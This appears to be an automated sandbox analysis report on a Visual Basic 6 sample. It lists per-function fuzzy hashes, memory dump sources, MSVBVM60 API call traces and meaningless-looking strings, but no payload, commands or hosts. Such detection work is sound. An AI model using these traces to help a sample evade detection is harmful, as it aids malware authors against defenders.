Opcode Fuzzy Hash: e644ca7f7980893ee48b0e41c72ff9ad7f7e7e306de08e18c3fe264db7f04670
Instruction Fuzzy Hash: 35F11371A0074ADFDB34CF29CC94BDAB7A2FF59350F99422ADC8C97200D770AA558B91

Uniqueness

Uniqueness Score: -1.00%

Function 002A4785, Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d16d583d273bd1b328526510d13361c19812126aaf761bbbe4f0369bdba1bd
Instruction ID: b19c5f0e1a91a1e5d35a655667a2d26a436e0547f7830bc485038d77db1af947
Opcode Fuzzy Hash: 63d16d583d273bd1b328526510d13361c19812126aaf761bbbe4f0369bdba1bd
Instruction Fuzzy Hash: 88D11E71A5438A9FDF349E38CC887DA3BA2BF56350F64412AEC88DB210D7718A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002A3F0C, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1007d70cb715446e1e0b559367ac84e84a731065e02d6aaa09b9ff247fbc6bba
Instruction ID: 8eae9c7c5587025e476243c3155af98479d039cc81a81abb3aeae6249d331753
Opcode Fuzzy Hash: 1007d70cb715446e1e0b559367ac84e84a731065e02d6aaa09b9ff247fbc6bba
Instruction Fuzzy Hash: D6A10E7160430ACFDB286E34C8697EABBA2FF91340F86821EDDC967254D7344986CF42

Uniqueness

Uniqueness Score: -1.00%

Function 002A8C82, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3738e0565a38b2e301be2289d34efcbf3596b746cb5bf906cd541c5ff286cc
Instruction ID: 1377eaebf66b4b2bddaffd67063d58df11703626fcc510bf5b88bca0801a054c
Opcode Fuzzy Hash: 4e3738e0565a38b2e301be2289d34efcbf3596b746cb5bf906cd541c5ff286cc
Instruction Fuzzy Hash: 80714A716143468FEF349E39C9A47EA77A3BF96350F92403ACD8ACB214D7308585CB55

Uniqueness

Uniqueness Score: -1.00%

Function 002A8CD5, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 665d9c0a9e865c1b3527fe1bd17adf92348a1ad8c05a199dcbe32a78315cb529
Instruction ID: 6bd7c1c89d00493d2ca6638db0700bf9c4574eb0f8dc56ac389a8ba2a6864c7f
Opcode Fuzzy Hash: 665d9c0a9e865c1b3527fe1bd17adf92348a1ad8c05a199dcbe32a78315cb529
Instruction Fuzzy Hash: E271473161434ACFEF349E39C9A47EA77A2BF96350F92407ACD8A8B214D730C985CB55

Uniqueness

Uniqueness Score: -1.00%

Function 002A8D58, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3e478331a0c149e20260787dc74e320075e11248712bc8a2f4a9b0d9282433
Instruction ID: 32ad12b0aa3798bbb1d3c51b8889c27f09d32d26e398d8c0311046690d6b8f10
Opcode Fuzzy Hash: 4b3e478331a0c149e20260787dc74e320075e11248712bc8a2f4a9b0d9282433
Instruction Fuzzy Hash: 29619B7161424A8FEF359E35C9A43EA7BA2FF96350F92817ACD858B215D730C985CB40

Uniqueness

Uniqueness Score: -1.00%

Function 002A1B2D, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3269653db9c15913c9e10e6d08c9d666489e28f8f7ddc4dfebef25b170d33d38
Instruction ID: deca9424a35efab82bea178e26f2015e68817fcb3f597c26a016754b72b5d709
Opcode Fuzzy Hash: 3269653db9c15913c9e10e6d08c9d666489e28f8f7ddc4dfebef25b170d33d38
Instruction Fuzzy Hash: 2B614A726442899FDB348E39CC54BDB7BB7AFD6350F58422ADC8C87259D3314A468F40

Uniqueness

Uniqueness Score: -1.00%

Function 002A34C4, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1739612be62fec0426e3f77743a86624e60d1764ea225ebf32e8174df8c95114
Instruction ID: 174453f33428ffdf475153ee293ac0151445a9385d18ab9b1a95029fe1d967ba
Opcode Fuzzy Hash: 1739612be62fec0426e3f77743a86624e60d1764ea225ebf32e8174df8c95114
Instruction Fuzzy Hash: DA619A71654349CFDF349E358DA97DB77A7AF92340F96862EDC8587119C3308A85CA01

Uniqueness

Uniqueness Score: -1.00%

Function 002A350F, Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b749c3e610fe035121be5ca76caf3bef32e7eee0d8875fd10bb0250f6c819c00
Instruction ID: 6f638a1c21842df810a859b7da707b7ef8105785be1c137ff96a5e4b6cebe273
Opcode Fuzzy Hash: b749c3e610fe035121be5ca76caf3bef32e7eee0d8875fd10bb0250f6c819c00
Instruction Fuzzy Hash: 3C51A631640349DFDB348E39CDA87EB77A3AFD6310F96852EDC8987159C7309A86CA01

Uniqueness

Uniqueness Score: -1.00%

Function 002A2183, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b864eb8b61d91f5d08a4964d865556773e7bf82cb249eca9f8da1f132cfd11b
Instruction ID: 235feb04e533e2ee2cba8448536f7e0ed71c28f83b1567e28df406b352d1cae1
Opcode Fuzzy Hash: 6b864eb8b61d91f5d08a4964d865556773e7bf82cb249eca9f8da1f132cfd11b
Instruction Fuzzy Hash: 875135757003468FEB349E298DA57DB77A3BFDA3A0F95412DEC8987294CB3489898701

Uniqueness

Uniqueness Score: -1.00%

Function 002A2793, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60965f03207346a198c8592a8de58e47eedf61c5fc0ede2803793b6281c7a9b0
Instruction ID: a04c632f1390a3a62aa6f4b3739c215aa8a04ff9e1e03182c638d2fb16cd7e34
Opcode Fuzzy Hash: 60965f03207346a198c8592a8de58e47eedf61c5fc0ede2803793b6281c7a9b0
Instruction Fuzzy Hash: F741993121438A9FDB258E7589A53EA7BA3BFA3310F24842DDDCAC7641C7308995D713

Uniqueness

Uniqueness Score: -1.00%

Function 002A8385, Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a34a9d2bb49952a2350a636121913e34f91c078898984afe60cf9cdc2fc2a198
Instruction ID: 502dcdbde5b21bdd1691fca0d1e1e800ff3b204fc1018f06e1b879f7925b02b2
Opcode Fuzzy Hash: a34a9d2bb49952a2350a636121913e34f91c078898984afe60cf9cdc2fc2a198
Instruction Fuzzy Hash: 01413731A182868FDF349E34C9A57DF7BA3AF56710F95816ACC894B249DB308946C712

Uniqueness

Uniqueness Score: -1.00%

Function 002A4B8E, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f237865403371c53baf511d90caa3295c9c056eb95273841278d0e95b03bb72a
Instruction ID: 3ccbf84f5b9073385f00a2949110907db05dc299a8c9c168c4c11d39f6376ff2
Opcode Fuzzy Hash: f237865403371c53baf511d90caa3295c9c056eb95273841278d0e95b03bb72a
Instruction Fuzzy Hash: 8841ED315102499FCF759E38CC887DA3B72FF56310F54812AED4D8B210CB758A95CB90

Uniqueness

Uniqueness Score: -1.00%

Function 002A7B73, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fac6c25e3909cca6d4eccda6cfe5e2961e853137e6b5abca8ca2c82c12a7e7
Instruction ID: a4fab73921f458ff00bde8e427f674433c5eebee5ff6b1989d51472b599cfab9
Opcode Fuzzy Hash: 41fac6c25e3909cca6d4eccda6cfe5e2961e853137e6b5abca8ca2c82c12a7e7
Instruction Fuzzy Hash: 8D2165726106018FDB205E788DA63DB77A6AF57360FA2451EDCC6DB255DB3089858F01

Uniqueness

Uniqueness Score: -1.00%

Function 002A844C, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0b64c744ff8e58681f4b7dfdafd50dfff910234d02cdfe5a4d071014b200cc
Instruction ID: eea604a66f580e6958521aad463212aa49045c516bebace0b0cea521ffc8eec1
Opcode Fuzzy Hash: 5e0b64c744ff8e58681f4b7dfdafd50dfff910234d02cdfe5a4d071014b200cc
Instruction Fuzzy Hash: D0319272A143414FDF349E34C9A53DF7B93BF66310F85829ACC958B649DB348446C652

Uniqueness

Uniqueness Score: -1.00%

Function 002A71A9, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2d1846fe37f4737d90b826ac92fe6bfa9fd553f583b1db54a2e33603f1f58a
Instruction ID: b5e43a45f0905517bb1dfd49dba42e81285866920617906f569c33b477574002
Opcode Fuzzy Hash: 1b2d1846fe37f4737d90b826ac92fe6bfa9fd553f583b1db54a2e33603f1f58a
Instruction Fuzzy Hash: 4611537135438A8FCB30CE28C9C4BDA73E2BF19314F81443ADD5A9B262C7309A50CA14

Uniqueness

Uniqueness Score: -1.00%

Function 002A50CA, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 002A6B93, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844a07f6066d0972c1f3af2ad6572c8dea082bba16f432667845158705520a90
Instruction ID: c74afd1e2a157885b9cdc988f14599c24a79e655c21c6cd5f458fa94a46edb96
Opcode Fuzzy Hash: 844a07f6066d0972c1f3af2ad6572c8dea082bba16f432667845158705520a90
Instruction Fuzzy Hash: 76B00275651640CFCF55CF49C594F4173B4F758750F4154D4E8518FB11C264E900CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0043540F, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00432F14,00432F0C,?,000000FF,00000000), ref: 0043546B
__vbaStrMove.MSVBVM60(00432F14,00432F0C,?,000000FF,00000000), ref: 00435475
#711.MSVBVM60(?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 0043547F
__vbaAryVar.MSVBVM60(00002008,?,?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 0043548D
__vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 0043549D
__vbaFreeStr.MSVBVM60(?,?,00002008,?,?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 004354A5
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,00000000,00432F14,00432F0C,?,000000FF,00000000), ref: 004354B4
__vbaStrCmp.MSVBVM60(00432F0C,?), ref: 004354CD
__vbaNew2.MSVBVM60(0043199C,`Sb,00432F0C,?), ref: 004354E9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00435501
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CF8,00000048), ref: 00435521
#531.MSVBVM60(?), ref: 00435529
__vbaFreeStr.MSVBVM60(?), ref: 00435531
__vbaFreeObj.MSVBVM60(?), ref: 00435539
__vbaNew2.MSVBVM60(0043199C,`Sb,00432F0C,?), ref: 00435551
__vbaObjSet.MSVBVM60(?,00000000), ref: 00435569
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001A0), ref: 0043558F
__vbaFreeObj.MSVBVM60(00000000,00000000,00432D70,000001A0), ref: 0043559D
__vbaAryDestruct.MSVBVM60(00000000,?,004355D8), ref: 004355D2

Strings

`Sb, xrefs: 004354D6, 004354DF, 004354EE, 0043553E, 00435547, 00435556

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckHresultNew2$#531#711CopyDestructListMove
String ID: `Sb
API String ID: 1202614378-2243697873
Opcode ID: e8b982305b701467d9f06b4701d878956078b949556f327331ef9513c773eb0d
Instruction ID: 670a67046e35178a3fe736329d8735255595e13288c1414161bb6763de952726
Opcode Fuzzy Hash: e8b982305b701467d9f06b4701d878956078b949556f327331ef9513c773eb0d
Instruction Fuzzy Hash: 6E414BB1900208ABDB14EB96CD46EEEB7BCBF58304F50052BF511B71A1DB7CA9058B69

Uniqueness

Uniqueness Score: -1.00%

Function 00436103, Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00432FB8,00432FB0,00000001,?), ref: 00436166
__vbaStrMove.MSVBVM60(00432FB8,00432FB0,00000001,?), ref: 00436170
__vbaStrCat.MSVBVM60(00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 0043617B
__vbaStrMove.MSVBVM60(00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 00436185
#628.MSVBVM60(00000000,00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 0043618B
__vbaStrMove.MSVBVM60(00000000,00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 00436195
__vbaStrCmp.MSVBVM60(00432FB0,00000000,00000000,00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 0043619C
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00432FB0,00000000,00000000,00432FC4,00000000,00432FB8,00432FB0,00000001,?), ref: 004361B9
__vbaFreeVar.MSVBVM60(?), ref: 004361C4
__vbaNew2.MSVBVM60(0043199C,`Sb,?), ref: 004361E5
__vbaObjSet.MSVBVM60(?,00000000), ref: 004361FD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432CE8,00000100), ref: 00436223
__vbaFpI4.MSVBVM60(?,?,?,00000000,00000000,00432CE8,00000100), ref: 00436254
__vbaHresultCheckObj.MSVBVM60(00000000,004012B0,00432758,000002C0,?,?,?,00000000), ref: 00436293
__vbaFreeObj.MSVBVM60(?,?,?,00000000), ref: 0043629B

Strings

`Sb, xrefs: 004361D2, 004361DB, 004361EA

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$FreeMove$CheckHresult$#628ListNew2
String ID: `Sb
API String ID: 2062027099-2243697873
Opcode ID: 6d04005a70cb3e85452221807574a480980c37bbdbf1ecefcb323d72518eeb92
Instruction ID: 81f3ed2391a281d05d79455daf37f34854cbe74ca8376e7805096f1d9f08af89
Opcode Fuzzy Hash: 6d04005a70cb3e85452221807574a480980c37bbdbf1ecefcb323d72518eeb92
Instruction Fuzzy Hash: BB41AFB1941209ABCB10EBA2DD49EAEBBBCFF18304F11456BF441F31B1CB7859008B68

Uniqueness

Uniqueness Score: -1.00%

Function 00435873, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00432E4C,0043746C), ref: 004358BB
__vbaHresultCheckObj.MSVBVM60(00000000,01D6F6F4,00432E3C,00000014), ref: 004358DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00432F18,00000058), ref: 00435902
__vbaStrMove.MSVBVM60 ref: 00435910
__vbaFreeObj.MSVBVM60 ref: 00435918
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00435930
__vbaObjSet.MSVBVM60(?,00000000), ref: 00435948
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432DFC,00000058), ref: 00435968
__vbaFreeObj.MSVBVM60 ref: 00435976
__vbaFreeStr.MSVBVM60(0043599D), ref: 00435997

Strings

`Sb, xrefs: 0043591D, 00435926, 00435935

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$New2$Move
String ID: `Sb
API String ID: 2227187868-2243697873
Opcode ID: 430a7616afbe833805e02dd6168955eeb7b036181c061a8c5814e46a74f10c75
Instruction ID: e2bfae0f4101442dca42f6758713ee20e81d50469c9c497414c0ec7910315bcb
Opcode Fuzzy Hash: 430a7616afbe833805e02dd6168955eeb7b036181c061a8c5814e46a74f10c75
Instruction Fuzzy Hash: DC3183B0940608ABCB14EB96CD46EEEBBB8FF5C714F20541AF001B72A1D67C6905CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00435FE5, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

#589.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,004012D6), ref: 0043602A
__vbaNew2.MSVBVM60(00432E4C,0043746C,00000001), ref: 00436048
__vbaHresultCheckObj.MSVBVM60(00000000,01D6F6F4,00432E3C,0000004C), ref: 0043606C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00432E5C,00000024), ref: 00436099
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004012D6), ref: 004360A7
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004012D6), ref: 004360AF
__vbaFreeStr.MSVBVM60(004360DC,00000001), ref: 004360D6

Strings

Trespassory7, xrefs: 0043607A
3+, xrefs: 004360B4
Gennemlyste, xrefs: 0043607F

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$#589MoveNew2
String ID: 3+$Gennemlyste$Trespassory7
API String ID: 1767156754-2597507220
Opcode ID: 6188ff39680287c379815e40fd7289bf2624903344a69b81474d934b1529f430
Instruction ID: 3471bc53f4aeaa4db11e57cc4609061d4264d4da27a59fec6320d76ae3109752
Opcode Fuzzy Hash: 6188ff39680287c379815e40fd7289bf2624903344a69b81474d934b1529f430
Instruction Fuzzy Hash: 62213070940215ABCB14EF95C946EAEBBF8EF58704F20915AF500B72A1C7BC69058B69

Uniqueness

Uniqueness Score: -1.00%

Function 004355F5, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00435648
__vbaObjSet.MSVBVM60(?,00000000), ref: 00435660
__vbaNew2.MSVBVM60(0043199C,`Sb,?,00000000), ref: 00435688
__vbaObjSet.MSVBVM60(?,00000000), ref: 004356A0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000000A8), ref: 004356C6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001EC), ref: 004356F5
__vbaFreeStr.MSVBVM60 ref: 004356FD
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0043570C

Strings

`Sb, xrefs: 0043562C, 0043563E, 0043564D, 00435667, 0043567E, 0043568D

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2$List
String ID: `Sb
API String ID: 2509323985-2243697873
Opcode ID: 22c47779e16a48da59080eae7ece68f07901b2efce5f57e95725ca6924f4b971
Instruction ID: 708b0d6b0c6f0b816a4a683f31335bf59e457f10f7f9e5477d2025cbc020b1a9
Opcode Fuzzy Hash: 22c47779e16a48da59080eae7ece68f07901b2efce5f57e95725ca6924f4b971
Instruction Fuzzy Hash: F231B4B4940608ABCB10EF96CC46FAEBBBCFF09704F50442AF445E72A1C77C95018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004362ED, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00432E4C,0043746C), ref: 0043633C
__vbaHresultCheckObj.MSVBVM60(00000000,01D6F6F4,00432E3C,00000014), ref: 00436360
__vbaHresultCheckObj.MSVBVM60(00000000,?,00432F18,00000050), ref: 00436383
__vbaStrCmp.MSVBVM60(00000000,?), ref: 0043638C
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0043639D
__vbaFreeObj.MSVBVM60(00000000,?), ref: 004363A5
__vbaFileOpen.MSVBVM60(00000020,000000FF,000000CC,gladeligt,00000000,?), ref: 004363BD

Strings

gladeligt, xrefs: 004363AF

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$FileNew2Open
String ID: gladeligt
API String ID: 1550884760-4246425414
Opcode ID: fa585a13a9395edeb2ac73d640f44a518a756dedc099ceb816f04c52ed2ca9f3
Instruction ID: 45d114d4640ba2e7366dfde682ae0c95f6d5cfbfff4ac18c4abef8451f5296b5
Opcode Fuzzy Hash: fa585a13a9395edeb2ac73d640f44a518a756dedc099ceb816f04c52ed2ca9f3
Instruction Fuzzy Hash: 3621F570940615BBDB10EB95CC46EAFBBB8EF58708F20911BF911B72E1C6BC58018A99

Uniqueness

Uniqueness Score: -1.00%

Function 00435D74, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00435DAA
__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00435DC2
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00435DDA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D60,0000022C), ref: 00435DFC
__vbaFreeObj.MSVBVM60 ref: 00435E04
__vbaFreeStr.MSVBVM60(00435E22), ref: 00435E1C

Strings

`Sb, xrefs: 00435DAF, 00435DB8, 00435DC7

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Free$CheckCopyHresultNew2
String ID: `Sb
API String ID: 4138333463-2243697873
Opcode ID: d8ed7a9092747571caf9ad5dfeb990a9355afcb156c795ab5e33ff62888f2ae5
Instruction ID: 05641ab9ac4bc3e4dc0d04d4b7b18c034fbc1e74a87b7ace31424ff4c2f6553e
Opcode Fuzzy Hash: d8ed7a9092747571caf9ad5dfeb990a9355afcb156c795ab5e33ff62888f2ae5
Instruction Fuzzy Hash: 3E115274500608ABC714EBA6CD4AFAF77B8EF08748F60447AF051B71A2D7785A0486A9

Uniqueness

Uniqueness Score: -1.00%

Function 00435C3B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00435C7A
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00435C92
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001EC), ref: 00435CD3
__vbaFreeObj.MSVBVM60 ref: 00435CDB

Strings

Polyodontidae9, xrefs: 00435CB4
`Sb, xrefs: 00435C63, 00435C70, 00435C7F

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: Polyodontidae9$`Sb
API String ID: 1645334062-870290315
Opcode ID: b38f728eae063f83350498a2bb74d5176519adce6a36ebd00b32a54f0569f7ed
Instruction ID: d8f63dadd0c7f86bd8fcc0d0bcd8b6351cbec3edceae88e64d0f90caf6119d0b
Opcode Fuzzy Hash: b38f728eae063f83350498a2bb74d5176519adce6a36ebd00b32a54f0569f7ed
Instruction Fuzzy Hash: 2C1173B0540704ABDB10DF95CE46BAF76BCEB09708F60146AF401B71A1D2B859018769

Uniqueness

Uniqueness Score: -1.00%

Function 00435A7D, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0043199C,`Sb), ref: 00435ABC
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00435AD4
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00432D70,000001EC), ref: 00435B15
__vbaFreeObj.MSVBVM60 ref: 00435B1D

Strings

BNHRER, xrefs: 00435AF6
`Sb, xrefs: 00435AA5, 00435AB2, 00435AC1

Memory Dump Source

Source File: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2365766403.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2365800277.0000000000437000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.2365808830.0000000000438000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: BNHRER$`Sb
API String ID: 1645334062-1766636646
Opcode ID: 81fc4d986dd3457e5cdba8d07544aedaa8c22a35fcc032520ac56dd30198363a
Instruction ID: 48bdf528161e98126a0c8465fdf0cc7ba51ed57cd699bd72c4aea50de1452adc
Opcode Fuzzy Hash: 81fc4d986dd3457e5cdba8d07544aedaa8c22a35fcc032520ac56dd30198363a
